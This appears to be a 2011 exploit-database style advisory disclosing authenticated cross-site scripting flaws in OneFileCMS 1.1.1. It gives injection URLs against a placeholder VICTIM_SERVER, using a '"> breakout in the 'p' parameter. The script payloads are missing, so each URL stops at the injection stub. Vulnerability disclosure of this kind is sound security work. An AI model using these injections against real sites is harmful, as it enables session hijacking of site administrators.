# Exploit Title: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities # Google Dork: -- # Date: 21/8/2011 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr # Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip # Version: OneFileCMS v.1.1.1 # Tested on: Linux Fedora 14 =============== Description =============== OneFileCMS is just that. It's a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs. ======================================================= [!] All vulnerabilities requires authentication. [!] ======================================================= ============================================ 0x01. Cross Site Scripting vulnerability ============================================ http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"> http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"> ----------------------------------------------------------------------------- [!] Redirection to Google through the cross site scripting vulnerability [!] ------------------------------------------------------------------------------ http://VICTIM_SERVER/onefilecms/onefilecms.php?p='">